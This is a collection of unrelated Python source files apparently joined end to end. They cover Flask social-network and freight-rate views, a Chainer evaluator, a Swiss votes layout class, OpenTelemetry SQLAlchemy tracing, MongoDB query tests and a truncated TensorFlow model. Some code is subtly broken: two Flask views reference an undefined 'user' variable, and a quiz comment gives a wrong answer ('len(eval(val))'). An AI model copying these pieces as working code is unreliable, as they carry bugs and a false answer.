flash(_('Your post is now live!'))
return redirect(url_for('main.index'))
page = request.args.get('page', 1, type=int)
posts = current_user.followed_posts().paginate(
page, current_app.config['POSTS_PER_PAGE'], False)
next_url = url_for('main.index', page=posts.next_num) \
if posts.has_next else None
prev_url = url_for('main.index', page=posts.prev_num) \
if posts.has_prev else None
return render_template('index.html', title=_('Home'), form=form,
posts=posts.items, next_url=next_url,
prev_url=prev_url)
@bp.route('/explore')
@login_required
def explore():
page = request.args.get('page', 1, type=int)
posts = Post.query.order_by(Post.timestamp.desc()).paginate(
page, current_app.config['POSTS_PER_PAGE'], False)
next_url = url_for('main.explore', page=posts.next_num) \
if posts.has_next else None
prev_url = url_for('main.explore', page=posts.prev_num) \
if posts.has_prev else None
return render_template('index.html', title=_('Explore'),
posts=posts.items, next_url=next_url,
prev_url=prev_url)
@bp.route('/user/<username>')
@login_required
def user(username):
user = User.query.filter_by(username=username).first_or_404()
page = request.args.get('page', 1, type=int)
posts = user.posts.order_by(Post.timestamp.desc()).paginate(
page, current_app.config['POSTS_PER_PAGE'], False)
next_url = url_for('main.user', username=user.username,
page=posts.next_num) if posts.has_next else None
prev_url = url_for('main.user', username=user.username,
page=posts.prev_num) if posts.has_prev else None
return render_template('user.html', user=user, posts=posts.items,
next_url=next_url, prev_url=prev_url)
@bp.route('/edit_profile', methods=['GET', 'POST'])
@login_required
def edit_profile():
form = EditProfileForm(current_user.username)
if form.validate_on_submit():
current_user.username = form.username.data
current_user.about_me = form.about_me.data
db.session.commit()
flash(_('Your changes have been saved.'))
return redirect(url_for('main.edit_profile'))
elif request.method == 'GET':
form.username.data = current_user.username
form.about_me.data = current_user.about_me
return render_template('edit_profile.html', title=_('Edit Profile'),
form=form)
@bp.route('/follow/<username>')
@login_required
def follow(username):
user = User.query.filter_by(username=username).first()
if user is None:
flash(_('User %(username)s not found.', username=username))
return redirect(url_for('main.index'))
if user == current_user:
flash(_('You cannot follow yourself!'))
return redirect(url_for('main.user', username=username))
current_user.follow(user)
db.session.commit()
flash(_('You are following %(username)s!', username=username))
return redirect(url_for('main.user', username=username))
@bp.route('/unfollow/<username>')
@login_required
def unfollow(username):
user = User.query.filter_by(username=username).first()
if user is None:
flash(_('User %(username)s not found.', username=username))
return redirect(url_for('main.index'))
if user == current_user:
flash(_('You cannot unfollow yourself!'))
return redirect(url_for('main.user', username=username))
current_user.unfollow(user)
db.session.commit()
flash(_('You are not following %(username)s.', username=username))
return redirect(url_for('main.user', username=username))
@bp.route('/translate', methods=['POST'])
@login_required
def translate_text():
return jsonify({'text': translate(request.form['text'],
request.form['source_language'],
request.form['dest_language'])})
@bp.route('/search')
@login_required
def search():
if not g.search_form.validate():
return redirect(url_for('main.explore'))
page = request.args.get('page', 1, type=int)
posts, total = Post.search(g.search_form.q.data, page,
current_app.config['POSTS_PER_PAGE'])
next_url = url_for('main.search', q=g.search_form.q.data, page=page + 1) \
if total > page * current_app.config['POSTS_PER_PAGE'] else None
prev_url = url_for('main.search', q=g.search_form.q.data, page=page - 1) \
if page > 1 else None
return render_template('search.html', title=_('Search'), posts=posts,
next_url=next_url, prev_url=prev_url)
states = {
'AK': 'Alaska',
'AL': 'Alabama',
'AR': 'Arkansas',
'AS': 'American Samoa',
'AZ': 'Arizona',
'CA': 'California',
'CO': 'Colorado',
'CT': 'Connecticut',
'DC': 'District of Columbia',
'DE': 'Delaware',
'FL': 'Florida',
'GA': 'Georgia',
'GU': 'Guam',
'HI': 'Hawaii',
'IA': 'Iowa',
'ID': 'Idaho',
'IL': 'Illinois',
'IN': 'Indiana',
'KS': 'Kansas',
'KY': 'Kentucky',
'LA': 'Louisiana',
'MA': 'Massachusetts',
'MD': 'Maryland',
'ME': 'Maine',
'MI': 'Michigan',
'MN': 'Minnesota',
'MO': 'Missouri',
'MP': 'Northern Mariana Islands',
'MS': 'Mississippi',
'MT': 'Montana',
'NA': 'National',
'NC': 'North Carolina',
'ND': 'North Dakota',
'NE': 'Nebraska',
'NH': 'New Hampshire',
'NJ': 'New Jersey',
'NM': 'New Mexico',
'NV': 'Nevada',
'NY': 'New York',
'OH': 'Ohio',
'OK': 'Oklahoma',
'OR': 'Oregon',
'PA': 'Pennsylvania',
'PR': 'Puerto Rico',
'RI': 'Rhode Island',
'SC': 'South Carolina',
'SD': 'South Dakota',
'TN': 'Tennessee',
'TX': 'Texas',
'UT': 'Utah',
'VA': 'Virginia',
'VI': 'Virgin Islands',
'VT': 'Vermont',
'WA': 'Washington',
'WI': 'Wisconsin',
'WV': 'West Virginia',
'WY': 'Wyoming'
}
@bp.route('/post_rate', methods=['POST','GET'])
@login_required
def post_rate():
form = PostRateForm()
if form.validate_on_submit():
rate = Rate(equipment_type=form.equipment_type.data,
hazardous_freight=form.hazardous_freight.data,
origin=form.origin.data,
destination=form.destination.data,
brokered_load=form.brokered_load.data,
weather=form.weather.data,
rate_per_mile=form.rate_per_mile.data,
deadhead=form.dead_head.data,
author=current_user)
db.session.add(rate)
db.session.commit()
flash(_('Your rate has been saved.'))
return redirect(url_for('main.index'))
return render_template('post_rate.html', title=_('Post Rate'),
form=form)
@bp.route('/search_rate', methods=['POST','GET'])
@login_required
def search_rates():
form = SearchRatesForm()
if form.validate_on_submit():
page = request.args.get('page', 1, type=int)
rates = Rate.query.filter(Rate.origin==form.origin.data,
Rate.destination == form.destination.data,
Rate.equipment_type == form.equipment_type.data).order_by(Rate.timestamp.desc()).paginate(
page, current_app.config['POSTS_PER_PAGE'], False)
next_url = url_for('main.user', username=user.username,
page=rates.next_num) if rates.has_next else None
prev_url = url_for('main.user', username=user.username,
page=rates.prev_num) if rates.has_prev else None
return render_template('search_rates_screen.html', user=user, rates=rates.items,
next_url=next_url, prev_url=prev_url, form=form)
return render_template('search_rates_screen.html',
form=form)
@bp.route('/post_review', methods=['POST','GET'])
@login_required
def post_review():
form = LocationReviewForm()
return render_template('post_review.html', title=_('Post Review'), form=form)
@bp.route('/review_handler', methods=['POST','GET'])
@login_required
def review_handler():
shipper = request.form['shipper']
unloading_score = request.form['unloading_score']
lateness_score = request.form['lateness_score']
comments = request.form['comments']
consignee = request.form['consignee']
address = request.form['autocomplete']
street_number = request.form['street_number']
street_name = request.form['route']
city = request.form['locality']
state = request.form['state']
country = request.form['country']
zip_code = request.form['postal_code']
review = LocationReview(
address=address,
city=city,
state=state,
zip=zip_code,
country=country,
consignee=consignee,
comments=comments,
unloading_score=unloading_score,
shipper=shipper,
author=current_user,
lateness_score=lateness_score)
db.session.add(review)
db.session.commit()
flash(_('You have posted a review!'))
return redirect(url_for('main.index'))
@bp.route('/search_review', methods=['POST','GET'])
@login_required
def search_review():
return render_template('search_reviews_screen.html', title=_('Search Reviews'))
@bp.route('/search_review_handler', methods=['POST','GET'])
@login_required
def search_review_handler():
address = request.form['autocomplete']
page = request.args.get('page', 1, type=int)
reviews = LocationReview.query.filter_by(address=address).order_by(LocationReview.Date.desc()).paginate(
page, current_app.config['POSTS_PER_PAGE'], False)
next_url = url_for('main.user', username=user.username,
page=reviews.next_num) if reviews.has_next else None
prev_url = url_for('main.user', username=user.username,
page=reviews.prev_num) if reviews.has_prev else None
return render_template('search_reviews_screen_full.html', user=user, reviews=reviews.items,
next_url=next_url, prev_url=prev_url)
@bp.route('/autocomplete', methods=['GET'])
def autocomplete():
search = request.args.get('q')
query = db.session.query(City.full_city_name).filter(City.full_city_name.like('%' + str(search) + '%'))
results = []
for mv in query:
results.append(mv[0])
results = [mv[0] for mv in query.all()]
return jsonify(matching_results=results)
@bp.route('/user/<username>/popup')
@login_required
def user_popup(username):
user = User.query.filter_by(username=username).first_or_404()
return render_template('user_popup.html', user=user)
@bp.route('/send_message/<recipient>', methods=['GET', 'POST'])
@login_required
def send_message(recipient):
user = User.query.filter_by(username=recipient).first_or_404()
form = MessageForm()
if form.validate_on_submit():
msg = Message(author=current_user, recipient=user,
body=form.message.data)
db.session.add(msg)
user.add_notification('unread_message_count', user.new_messages())
db.session.commit()
flash(_('Your message has been sent.'))
return redirect(url_for('main.user', username=recipient))
return render_template('send_message.html', title=_('Send Message'),
form=form, recipient=recipient)
@bp.route('/messages')
@login_required
def messages():
current_user.last_message_read_time = datetime.utcnow()
current_user.add_notification('unread_message_count', 0)
db.session.commit()
page = request.args.get('page', 1, type=int)
messages = current_user.messages_received.order_by(
Message.timestamp.desc()).paginate(
page, current_app.config['POSTS_PER_PAGE'], False)
next_url = url_for('main.messages', page=messages.next_num) \
if messages.has_next else None
prev_url = url_for('main.messages', page=messages.prev_num) \
if messages.has_prev else None
return render_template('messages.html', messages=messages.items,
next_url=next_url, prev_url=prev_url)
@bp.route('/notifications')
@login_required
def notifications():
since = request.args.get('since', 0.0, type=float)
notifications = current_user.notifications.filter(
Notification.timestamp > since).order_by(Notification.timestamp.asc())
return jsonify([{
'name': n.name,
'data': n.get_data(),
'timestamp': n.timestamp
} for n in notifications])
@bp.route('/export_posts')
@login_required
def export_posts():
if current_user.get_task_in_progress('export_posts'):
flash(_('An export task is currently in progress'))
else:
current_user.launch_task('export_posts', _('Exporting posts...'))
db.session.commit()
return redirect(url_for('main.user', username=current_user.username))
# query = db.session.query(City.full_city_name)
|
FREE = 0
FIT = 1 |
import copy
import os
from collections import defaultdict
import chainer
import numpy as np
from chainer import DictSummary
from chainer import Reporter
from chainer.training.extensions import Evaluator
from overrides import overrides
from sklearn.metrics import f1_score
import config
class ActionUnitEvaluator(Evaluator):
trigger = 1, 'epoch'
default_name = 'AU_validation'
priority = chainer.training.PRIORITY_WRITER
def __init__(self, iterator, model, device, database, paper_report_label, converter, sample_frame,
output_path):
super(ActionUnitEvaluator, self).__init__(iterator, model, device=device, converter=converter)
self.T = sample_frame
self.database = database
self.paper_use_AU = []
self.paper_report_label = paper_report_label # original AU_idx -> original AU
paper_report_label_idx = list(paper_report_label.keys()) # original AU_idx
self.output_path = output_path
self.AU_convert = dict() # new_AU_idx -> AU
for new_AU_idx, orig_AU_idx in enumerate(sorted(paper_report_label_idx)):
self.AU_convert[new_AU_idx] = paper_report_label[orig_AU_idx]
if database == "BP4D":
self.paper_use_AU = config.paper_use_BP4D
elif database == "DISFA":
self.paper_use_AU = config.paper_use_DISFA
@overrides
def evaluate(self):
iterator = self._iterators['main']
_target = self._targets["main"]
if hasattr(iterator, 'reset'):
iterator.reset()
it = iterator
else:
it = copy.copy(iterator)
reporter = Reporter()
reporter.add_observer("main", _target)
summary = DictSummary()
model = _target
pred_labels_array = []
gt_labels_array = []
unreduce_pred = []
unreduce_gt = []
for idx, batch in enumerate(it):
print("processing :{}".format(idx))
batch = self.converter(batch, self.device)
images, bboxes, labels = batch # images shape = B*T, C, H, W; bboxes shape = B*T, F, 4; labels shape = B*T, F, 12
if not isinstance(images, chainer.Variable):
images = chainer.Variable(images.astype('f'))
bboxes = chainer.Variable(bboxes.astype('f'))
roi_feature, labels = model.get_roi_feature(images, bboxes, labels)
pred_labels = model.loss_head_module.predict(roi_feature) # B, T, F, 12
pred_labels = pred_labels[:, -1, :, :] # B, F, D
unreduce_pred.extend(pred_labels) # list of F,D
pred_labels = np.bitwise_or.reduce(pred_labels, axis=1) # B, class_number
labels = labels[:, -1, :, :] # B, F, D
unreduce_gt.extend(labels) # shape = list of F,D
labels = np.bitwise_or.reduce(labels, axis=1) # B, class_number
assert labels.shape == pred_labels.shape
pred_labels_array.extend(pred_labels)
gt_labels_array.extend(labels)
unreduce_pred = np.stack(unreduce_pred).astype(np.int32)
unreduce_gt = np.stack(unreduce_gt).astype(np.int32)
np.savez(self.output_path , pred=unreduce_pred, gt=unreduce_gt)
gt_labels_array = np.stack(gt_labels_array)
pred_labels_array = np.stack(pred_labels_array) # shape = all_N, out_size
gt_labels = np.transpose(gt_labels_array) # shape = Y x frame
pred_labels = np.transpose(pred_labels_array) #shape = Y x frame
report_dict = dict()
AU_id_convert_dict = self.AU_convert if self.AU_convert else config.AU_SQUEEZE
for new_AU_idx, frame_pred in enumerate(pred_labels):
if AU_id_convert_dict[new_AU_idx] in self.paper_use_AU:
AU = AU_id_convert_dict[new_AU_idx]
frame_gt = gt_labels[new_AU_idx]
F1 = f1_score(y_true=frame_gt, y_pred=frame_pred)
report_dict[AU] = F1
summary.add({"f1_frame_avg": F1})
observation = {}
with reporter.scope(observation):
reporter.report(report_dict, model)
reporter.report(summary.compute_mean(), model)
return observation |
from babel import Locale
from decimal import Decimal
from decimal import ROUND_HALF_UP
from functools import cached_property
from numbers import Integral
from onegov.core.elements import Link
from onegov.core.i18n import SiteLocale
from onegov.core.layout import ChameleonLayout
from onegov.core.static import StaticFile
from onegov.swissvotes import _
from onegov.swissvotes.collections import SwissVoteCollection
from onegov.swissvotes.collections import TranslatablePageCollection
from onegov.swissvotes.models import TranslatablePageMove
from onegov.user import Auth
class DefaultLayout(ChameleonLayout):
day_long_format = 'skeleton:MMMMd'
date_long_format = 'long'
datetime_long_format = 'medium'
def __init__(self, model, request):
super().__init__(model, request)
self.request.include('frameworks')
self.request.include('chosen')
self.request.include('common')
if 'swissvotes.ch' in request.url:
self.request.include('stats')
self.pages = TranslatablePageCollection(self.request.session)
@cached_property
def title(self):
return ""
@cached_property
def top_navigation(self):
result = [Link(_("Votes"), self.votes_url)]
for page in self.pages.query():
if page.id not in self.request.app.static_content_pages:
result.append(
Link(
page.title,
self.request.link(page),
sortable_id=page.id,
)
)
return result
@cached_property
def editbar_links(self):
return []
@cached_property
def breadcrumbs(self):
return [Link(_("Homepage"), self.homepage_url)]
@cached_property
def static_path(self):
return self.request.link(self.app.principal, 'static')
@cached_property
def sentry_init_path(self):
static_file = StaticFile.from_application(
self.app, 'sentry/js/sentry-init.js'
)
return self.request.link(static_file)
@cached_property
def homepage_url(self):
return self.request.link(self.app.principal)
@cached_property
def disclaimer_link(self):
page = self.pages.setdefault('disclaimer')
return Link(page.title, self.request.link(page))
@cached_property
def imprint_link(self):
page = self.pages.setdefault('imprint')
return Link(page.title, self.request.link(page))
@cached_property
def data_protection_link(self):
page = self.pages.setdefault('data-protection')
return Link(page.title, self.request.link(page))
@cached_property
def votes_url(self):
return self.request.link(SwissVoteCollection(self.request.app))
@cached_property
def login_url(self):
if not self.request.is_logged_in:
return self.request.link(
Auth.from_request(self.request, to=self.homepage_url),
name='login'
)
@cached_property
def logout_url(self):
if self.request.is_logged_in:
return self.request.link(
Auth.from_request(self.request, to=self.homepage_url),
name='logout'
)
@cached_property
def move_page_url_template(self):
return self.csrf_protected_url(
self.request.link(TranslatablePageMove.for_url_template())
)
@cached_property
def locales(self):
result = []
assert self.app.locales == {'de_CH', 'fr_CH', 'en_US'}
for locale_code in ('de_CH', 'fr_CH', 'en_US'):
locale = Locale.parse(locale_code)
result.append((
locale_code,
locale.language,
locale.get_language_name().capitalize(),
SiteLocale(locale_code).link(self.request, self.request.url)
))
return result
def format_policy_areas(self, vote):
paths = {}
for path in [area.label_path for area in vote.policy_areas]:
paths.setdefault(path[0], [])
paths[path[0]].append(path)
translate = self.request.translate
return ",<br>".join([
"<span title=\"{}\">{}</span>".format(
" ".join([
" > ".join([translate(part) for part in title])
for title in titles
]),
translate(value)
)
for value, titles in paths.items()
])
def format_bfs_number(self, number, decimal_places=None):
""" Hide the decimal places if there are none (simple votes). """
decimal_places = 0 if number.to_integral_value() == number else 1
return self.format_number(number, decimal_places)
def format_number(self, number, decimal_places=None, padding=''):
""" Takes the given numer and formats it according to locale.
If the number is an integer, the default decimal places are 0,
otherwise 2.
Overwrites parent class to use "." instead of "," for fr_CH locale
as would be returned by babel.
"""
if number is None:
return ''
if decimal_places is None:
if isinstance(number, Integral):
decimal_places = 0
else:
decimal_places = 2
if decimal_places is not None:
number = Decimal(number).quantize(
Decimal(10) ** -decimal_places,
rounding=ROUND_HALF_UP
)
locale = self.request.locale
# Fixes using "," for french locale instead of "." as for german
if locale == 'fr_CH':
locale = 'de_CH'
decimal, group = self.number_symbols(locale)
result = '{{:{},.{}f}}'.format(padding, decimal_places).format(number)
return result.translate({ord(','): group, ord('.'): decimal})
|
from src.image import plot_function
from src.pattern_recognition import linear
#################
# Inputs
#################
def main():
x = [
[0, 0],
[1, 0],
[2, 0],
[0, 1],
[1, 1],
[2, 1],
]
y = [
1,
1,
1,
-1,
-1,
-1,
]
w = linear.get_parameter_vector(x, y)
m = w[0] / w[1]
b = -(w[2] / w[1])
def decision_function(x2):
return m * x2 + b
decision_function_str = linear.get_decision_function_str(w)
plot_function(decision_function, xlabel="x2", ylabel="x1", title=decision_function_str)
if __name__ == '__main__':
main()
|
from typing import List
# 方法3:
class Solution:
def trap(self, height: List[int]) -> int:
"""
双指针,指向从左,从右的当前最高, 算出来后减去最大矩形
"""
lmax, rmax, res = 0, 0, 0
for i in range(len(height)):
lmax = max(lmax, height[i])
rmax = max(rmax, height[-1 - i])
res += lmax + rmax - height[i]
return res - lmax * len(height)
def trap_stack(self, height: List[int]) -> int:
"""
单调栈
"""
length = len(height)
if length < 3: return 0
res, idx = 0, 0
stack = []
while idx < length:
while len(stack) > 0 and height[idx] > height[stack[-1]]:
top = stack.pop() # index of the last element in the stack
if len(stack) == 0:
break
h = min(height[stack[-1]], height[idx]) - height[top]
dist = idx - stack[-1] - 1
res += (dist * h)
stack.append(idx)
idx += 1
return res
def trap_dp(self, height: List[int]) -> int:
# 边界条件
if not height: return 0
n = len(height)
maxleft = [0] * n
maxright = [0] * n
ans = 0
# 初始化
maxleft[0] = height[0]
maxright[n - 1] = height[n - 1]
# 设置备忘录,分别存储左边和右边最高的柱子高度
for i in range(1, n):
maxleft[i] = max(height[i], maxleft[i - 1])
for j in range(n - 2, -1, -1):
maxright[j] = max(height[j], maxright[j + 1])
# 一趟遍历,比较每个位置可以存储多少水
for i in range(n):
if min(maxleft[i], maxright[i]) > height[i]:
ans += min(maxleft[i], maxright[i]) - height[i]
return ans
|
import json
import os
import time
import pandas as pd
from constants import REGION_LIST
class Utils:
@staticmethod
def get_region_name_by_code(your_code: str):
for (code, name) in REGION_LIST:
if your_code == code:
return name
return ''
@staticmethod
def save_json_to_file(folder_name: str, text: dict):
path = os.path.join(os.getcwd(), 'ppwp_file')
folder_path = os.path.join(path, folder_name)
if not os.path.isdir(folder_path):
os.mkdir(folder_path)
filepath = os.path.join(folder_path, f'ppwp_{time.time()}.json')
with open(filepath, 'w') as outfile:
json.dump(text, outfile)
|
import numpy as np
import pandas as pd
txt = "./data0.txt"
file = open(txt, 'r')
lines = file.readlines()
data_size = len(lines)
state = []
action = []
index = 0
temp = ""
for index, line in enumerate(lines):
if line.find("[") != -1 and line.find("]") != -1:
line = line.strip('\n')
line = line.lstrip('[')
line = line.split(']')
line[1] = line[1].lstrip()
#line[1] = line[1].lstrip('[')
data1 = line[0].split()
action.append(line[1])
state.append(data1)
elif line.find("[") != -1 and line.find("]") == -1:
line = line.strip('\n')
line = line.lstrip('[')
temp = line
elif line.find("[") == -1 and line.find("]") != -1:
line = line.strip('\n')
line = line.split(']')
line[1] = line[1].lstrip()
line[1] = line[1].rstrip()
data1 = temp.split() + line[0].split()
action.append(line[1])
state.append(data1)
a = np.array(state)
a = a.astype(float)
b = np.array(action)
b = b.astype(int)
length = a.shape[0]
#print(a)
max_score = a.max(axis=1)
score_frame = pd.DataFrame(max_score)
print(score_frame.apply(pd.value_counts))
#print(b)
file.close() |
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sqlalchemy.event import listen
from opentelemetry import trace
from opentelemetry.ext.sqlalchemy.version import __version__
from opentelemetry.trace.status import Status, StatusCanonicalCode
# Network attribute semantic convention here:
# https://github.com/open-telemetry/opentelemetry-specification/blob/master/specification/trace/semantic_conventions/span-general.md#general-network-connection-attributes
_HOST = "net.peer.name"
_PORT = "net.peer.port"
# Database semantic conventions here:
# https://github.com/open-telemetry/opentelemetry-specification/blob/master/specification/trace/semantic_conventions/database.md
_ROWS = "sql.rows" # number of rows returned by a query
_STMT = "db.statement"
_DB = "db.type"
_URL = "db.url"
def _normalize_vendor(vendor):
"""Return a canonical name for a type of database."""
if not vendor:
return "db" # should this ever happen?
if "sqlite" in vendor:
return "sqlite"
if "postgres" in vendor or vendor == "psycopg2":
return "postgres"
return vendor
def _get_tracer(engine, tracer_provider=None):
if tracer_provider is None:
tracer_provider = trace.get_tracer_provider()
return tracer_provider.get_tracer(
_normalize_vendor(engine.name), __version__
)
# pylint: disable=unused-argument
def _wrap_create_engine(func, module, args, kwargs):
"""Trace the SQLAlchemy engine, creating an `EngineTracer`
object that will listen to SQLAlchemy events.
"""
engine = func(*args, **kwargs)
EngineTracer(_get_tracer(engine), None, engine)
return engine
class EngineTracer:
def __init__(self, tracer, service, engine):
self.tracer = tracer
self.engine = engine
self.vendor = _normalize_vendor(engine.name)
self.service = service or self.vendor
self.name = "%s.query" % self.vendor
self.current_span = None
listen(engine, "before_cursor_execute", self._before_cur_exec)
listen(engine, "after_cursor_execute", self._after_cur_exec)
listen(engine, "handle_error", self._handle_error)
# pylint: disable=unused-argument
def _before_cur_exec(self, conn, cursor, statement, *args):
self.current_span = self.tracer.start_span(self.name)
with self.tracer.use_span(self.current_span, end_on_exit=False):
self.current_span.set_attribute("service", self.vendor)
self.current_span.set_attribute(_STMT, statement)
if not _set_attributes_from_url(
self.current_span, conn.engine.url
):
_set_attributes_from_cursor(
self.current_span, self.vendor, cursor
)
# pylint: disable=unused-argument
def _after_cur_exec(self, conn, cursor, statement, *args):
if self.current_span is None:
return
try:
if cursor and cursor.rowcount >= 0:
self.current_span.set_attribute(_ROWS, cursor.rowcount)
finally:
self.current_span.end()
def _handle_error(self, context):
if self.current_span is None:
return
try:
self.current_span.set_status(
Status(
StatusCanonicalCode.UNKNOWN,
str(context.original_exception),
)
)
finally:
self.current_span.end()
def _set_attributes_from_url(span: trace.Span, url):
"""Set connection tags from the url. return true if successful."""
if url.host:
span.set_attribute(_HOST, url.host)
if url.port:
span.set_attribute(_PORT, url.port)
if url.database:
span.set_attribute(_DB, url.database)
return bool(url.host)
def _set_attributes_from_cursor(span: trace.Span, vendor, cursor):
"""Attempt to set db connection attributes by introspecting the cursor."""
if vendor == "postgres":
# pylint: disable=import-outside-toplevel
from psycopg2.extensions import parse_dsn
if hasattr(cursor, "connection") and hasattr(cursor.connection, "dsn"):
dsn = getattr(cursor.connection, "dsn", None)
if dsn:
data = parse_dsn(dsn)
span.set_attribute(_DB, data.get("dbname"))
span.set_attribute(_HOST, data.get("host"))
span.set_attribute(_PORT, int(data.get("port")))
|
#1/usr/bin/env/python
# -*- coding: utf-8 -*-
from app.command.fakeItCommand import FakeIt
from cleo import Application
application = Application()
application.add(FakeIt())
if __name__ == '__main__':
application.run()
|
"""
此conftest.py文件用作确保直接在项目下执行pytest命令时能正常导入utils等模块。
也可以不使用该文件,但是在项目中执行时要使用python -m pytest来执行用例。
"""
import os
from datetime import datetime
import pytest
from dotenv import load_dotenv
from utils.notify import Email
load_dotenv() # 将项目下的.env文件中变量添加到环境变量中
def pytest_configure(config):
"""更改生成报告的路径"""
htmlpath = config.getoption('htmlpath')
allure_report_dir = config.getoption('allure_report_dir')
now = datetime.now().strftime('%Y%m%d_%H%M%S')
print(htmlpath.format(now))
config.option.htmlpath = os.path.join(config.rootdir, 'reports', htmlpath.format(now))
""" allure报告路径 """
config.option.allure_report_dir = os.path.join(config.rootdir, 'reports', allure_report_dir)
def pytest_addoption(parser):
parser.addoption("--send-email", action="store_true", help="发送邮件")
parser.addini('email_subject', help='邮件主题')
parser.addini('email_receivers', help='收件人')
parser.addini('email_body', help='邮件正文')
def pytest_terminal_summary(config):
send_email = config.getoption("--send-email")
email_receivers = config.getini('email_receivers').split(',')
if send_email is True and email_receivers:
report_path = config.getoption('htmlpath')
email_subject = config.getini('email_subject') or 'TestReport'
email_body = config.getini('email_body') or 'Hi'
if email_receivers:
Email().send(email_subject, email_receivers, email_body, report_path)
|
# pow(x,0.5)函数可以计算x为正数的平方根 那么pow(x,0.5)计算x为负数的平方根输出为:
# 复数
# 打印信息换行使用的字符为:
# \n
# val=pow(2,1000),请用一行代码返回val结果的长度值
# len(eval(val))
# %运算符的含义:
# 求余
|
#!/usr/bin/env python
import random
import time
from subprocess import call
score=0
idx=0
while True:
for x in range(2,12):
idy=0
idx+=1
for y in range(2,12):
idy+=1
call(["clear"])
print "{0} {1} * {2} = {3}".format("\n"*idx+" "*idy,x,y," ")
time.sleep(1)
call(["clear"])
print "{0} {1} * {2} = {3}".format("\n"*idx+" "*idy,x,y, x*y)
time.sleep(0.5)
|
from flask import Flask
app = Flask(__name__)
from etsy import views
|
# encoding: utf-8
from __future__ import unicode_literals
import pytest
import operator
from collections import OrderedDict as odict
from marrow.mongo import Document, Field
from marrow.mongo.field import String, Number, Array, Embed
from marrow.mongo.query import Ops, Q
from marrow.mongo.util.compat import py3, str, unicode
class Sample(Document):
class Embedded(Document):
name = String()
generic = Field()
field = String('field_name')
number = Number('field_name', default=27)
array = Array(Number(default=42), name='field_name')
embed = Embed(Embedded)
mock_queryable = Sample.field
class TestQueryable(object): # TODO: Properly use pytest fixtures for this...
operators = [
(operator.lt, '$lt', 27, {'field_name': {'$lt': '27'}}),
(operator.le, '$lte', 27, {'field_name': {'$lte': '27'}}),
(operator.eq, '$eq', "hOI!", {'field_name': 'hOI!'}),
(operator.ne, '$ne', "hOI!", {'field_name': {'$ne': 'hOI!'}}),
(operator.ge, '$gte', 27, {'field_name': {'$gte': '27'}}),
(operator.gt, '$gt', 27, {'field_name': {'$gt': '27'}}),
]
singletons = [
(operator.neg, '$exists', {'field_name': {'$exists': 0}}),
(operator.pos, '$exists', {'field_name': {'$exists': 1}}),
(Q.of_type, '$type', {'field_name': {'$type': 'string'}}),
]
advanced = [
(Q.any, '$in', [1, 2, 3], {'field_name': {'$in': ['1', '2', '3']}}),
(Q.none, '$nin', [1, 2, 3], {'field_name': {'$nin': ['1', '2', '3']}}),
(Q.all, '$all', [1, 2, 3], {'field_name': {'$all': [1, 2, 3]}}),
(Q.match, '$elemMatch', {'name': "Bob"}, {'field_name': {'$elemMatch': {'name': 'Bob'}}}),
(Q.size, '$size', 42, {'field_name': {'$size': 42}}),
(Q.of_type, '$type', "double", {'field_name': {'$type': 'double'}}),
]
def test_attribute_access(self):
assert Sample.number.default == 27
assert Sample.array.default == 42
assert Sample.embed.name.__name__ == 'name'
with pytest.raises(AttributeError):
Sample.number.asdfasdf
with pytest.raises(AttributeError):
Sample.embed.asdfadsf
def test_repr(self):
assert repr(mock_queryable) == "Q(Sample, 'field_name', String('field_name'))"
def test_s(self):
assert unicode(Sample.array.S) == 'field_name.$'
def test_embedded(self):
assert unicode(Sample.embed.name) == 'embed.name'
def do_operator(self, operator, query, value, result, mock_queryable=mock_queryable):
op = operator(mock_queryable, value)
assert isinstance(op, Ops)
assert op.as_query == result
def do_singleton(self, operator, query, result):
op = operator(mock_queryable)
assert isinstance(op, Ops)
assert op.as_query == result
def test_operator_lt(self): self.do_operator(*self.operators[0])
def test_operator_lte(self): self.do_operator(*self.operators[1])
def test_operator_eq(self): self.do_operator(*self.operators[2])
def test_operator_ne(self): self.do_operator(*self.operators[3])
def test_operator_gte(self): self.do_operator(*self.operators[4])
def test_operator_gt(self): self.do_operator(*self.operators[5])
def test_operator_neg(self): self.do_singleton(*self.singletons[0])
def test_operator_pos(self): self.do_singleton(*self.singletons[1])
def test_operator_any(self): self.do_operator(*self.advanced[0])
def test_operator_none(self): self.do_operator(*self.advanced[1])
def test_operator_match(self): self.do_operator(*self.advanced[3])
def test_operator_type(self): self.do_operator(*self.advanced[5])
def test_operator_type_assumed(self): self.do_singleton(*self.singletons[2])
def test_operator_range(self):
op = Q.range(mock_queryable, 5, 11)
assert isinstance(op, Ops)
assert op.as_query == odict({'field_name': dict([('$gte', '5'), ('$lt', '11')])})
def test_op_failure(self):
with pytest.raises(NotImplementedError):
self.do_operator(*self.advanced[2], mock_queryable=Sample.array)
with pytest.raises(NotImplementedError):
self.do_operator(*self.advanced[4])
with pytest.raises(NotImplementedError):
Sample.number.size(27)
def test_operator_type_bare(self):
assert Sample.generic.of_type().as_query == {}
def test_operator_invert(self):
assert unicode(Sample.generic) == ~Sample.generic == 'generic'
def test_operator_re(self):
result = Sample.field.re(r'^', 'foo', r'\.')
assert result.as_query == {'field_name': {'$re': r'^foo\.'}}
def test_operator_size(self):
result = Sample.array.size(10)
assert result.as_query == {'field_name': {'$size': 10}}
def test_match_query(self):
result = Sample.array.match(Sample.Embedded.name == "Alice")
assert result.as_query == {'field_name': {'$elemMatch': {'name': "Alice"}}}
|
#coding:utf-8
import tensorflow as tf
import tensorflow.contrib.eager as tfe
from tensorflow.examples.tutorials.mnist import input_data
from tensorflow.keras.datasets import mnist
tfe.enable_eager_execution()
from tensorflow.keras import optimizers
from tensorflow.keras.datasets import cifar10, mnist
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2D, Dense, Flatten, MaxPooling2D
from tensorflow.keras.callbacks import LearningRateScheduler, TensorBoard
# from IPython import embed
# from tensorflow.data.Datasets
def build_model():
model = Sequential()
model.add(Conv2D(6, (5, 5), padding='valid', activation = 'relu', kernel_initializer='he_normal', input_shape=(28,28,1)))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(Conv2D(16, (5, 5), padding='valid', activation = 'relu', kernel_initializer='he_normal'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(Flatten())
